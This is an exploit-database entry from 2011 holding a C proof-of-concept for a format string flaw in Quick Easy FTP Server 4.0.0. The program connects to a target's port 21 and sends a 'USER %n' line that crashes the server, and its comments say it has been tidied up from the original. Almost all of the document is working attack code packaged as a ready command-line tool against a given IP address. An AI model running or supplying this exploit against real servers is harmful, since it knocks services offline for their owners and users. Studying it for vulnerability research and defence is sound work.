Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC



EKU-ID: 1085 CVE: OSVDB-ID:
Author: ylbhz Published: 2011-10-08 Verified: Verified


# Exploit Title: Quick easy ftp server 4.0.0 USER command format string Vulnerability
# Date: [date]
# Vendor or Software Link:google can help you.^_^
# Version: 4.0; other versions may be affected as well
# Category:: [remote]
# Tested on: win2k sp4 (cn)
 
Description:
Quick easy ftp server does not sanitize the string it passes as the format argument to wsprintfA, but the buffer is too small, so I think exploiting it further is difficult. I use the format specifier "%n" to crash the program, making it a denial-of-service attack.
 
#include <stdio.h>
#include <winsock2.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize);
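/*
 * Entry point. Usage: exp <ip address>
 *
 * Connects to port 21 of the given host and sends one USER line whose
 * argument contains a "%n" conversion. A server that hands the USER
 * argument to wsprintfA as the *format* (instead of passing it through a
 * fixed "%s" format) interprets the specifier and crashes, which is the
 * denial-of-service condition this PoC demonstrates.
 *
 * Returns 0 on success (or when usage is printed) and 1 if SendPayload
 * reports a failure, so a caller can tell the two apart.
 */
int main(int argc, char* argv[])
{
 if (argc != 2)
 {
  printf("Quick easy ftp server 4.0.0 USER命令格式化串漏洞(D.O.S) POC\r\n");
  printf("contact: ylbhz@hotmail.com\r\n");
  printf("C:\\>exp [ip address]\r\n");
  return 0;
 }
 /* The original strcpy'd argv[1] into a 20-byte stack buffer, which any
  * longer argument overflows. SendPayload only reads the host string, so
  * the argument is passed straight through and no copy is needed. */
 char lpBuf[] = "USER %n\r\n\r\n";
 if (SendPayload(argv[1], 21, lpBuf, lstrlenA(lpBuf)) != 0)
 {
  return 1;
 }
 return 0;
}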
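/*
 * Open a TCP connection to lpHost:intPort, send intSize bytes of lpPayload,
 * read (and discard) one reply, then close the connection.
 *
 * lpHost    dotted-quad IPv4 address (parsed with inet_addr; hostnames are
 *           not resolved)
 * intPort   TCP port, host byte order
 * lpPayload bytes to send, not interpreted by this function
 * intSize   number of bytes to send
 *
 * Returns 0 on success and -1 if Winsock initialisation, address parsing,
 * socket creation or connect fails. Every failure path releases what it had
 * acquired (socket, Winsock), and the success path now calls WSACleanup as
 * well, which the original omitted.
 */
int SendPayload(char* lpHost, int intPort, char* lpPayload, int intSize)
{
 WSADATA wsa;
 printf("[*]Init socket...\r\n");
 if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
 {
  printf("[-]WSAStartup Error!\r\n");
  return -1;
 }

 /* The original wrapped these assignments in try/catch(...); plain struct
  * stores cannot throw, so the only real failure is a malformed address,
  * which inet_addr() reports as INADDR_NONE. Check that instead. */
 struct sockaddr_in client = {0};
 client.sin_family = AF_INET;
 client.sin_port = htons((u_short)intPort);
 client.sin_addr.S_un.S_addr = inet_addr(lpHost);
 if (client.sin_addr.S_un.S_addr == INADDR_NONE)
 {
  printf("[-]socket_inaddr init error!\r\n");
  WSACleanup();
  return -1;
 }

 /* socket() reports failure with INVALID_SOCKET, not SOCKET_ERROR; the
  * original comparison never detected a failed socket() call. */
 SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
 if (sock == INVALID_SOCKET)
 {
  printf("[-]socket create error!\r\n");
  WSACleanup();
  return -1;
 }
 printf("[+]Socket Init success!\r\n");

 printf("[*]Connect the Server...\r\n");
 if (connect(sock, (struct sockaddr *)&client, sizeof(client)) == SOCKET_ERROR)
 {
  printf("[-]Connect Error!\r\n");
  closesocket(sock);
  WSACleanup();
  return -1;
 }
 printf("[+]Connect successfull!\r\n");

 printf("[*]Send Payload!\r\n");
 int intLen = send(sock, lpPayload, intSize, 0);
 if (intLen <= 0)
 {
  printf("[-]Send Payload Error!\r\n");
 }
 else
 {
  printf("Send %d bytes\r\n", intLen);
 }

 /* One reply is read only to give the server time to process the line; its
  * contents are discarded. A recv error or a 0-byte read is expected here
  * when the server has already crashed, so it is only reported, not fatal. */
 char strBuf[1024] = {0};
 intLen = recv(sock, strBuf, (int)sizeof(strBuf), 0);
 if (intLen == SOCKET_ERROR || intLen == 0)
 {
  printf("[*]No reply (connection closed or reset)\r\n");
 }

 printf("[*]Close Socket!\r\n");
 closesocket(sock);
 WSACleanup();
 return 0;
}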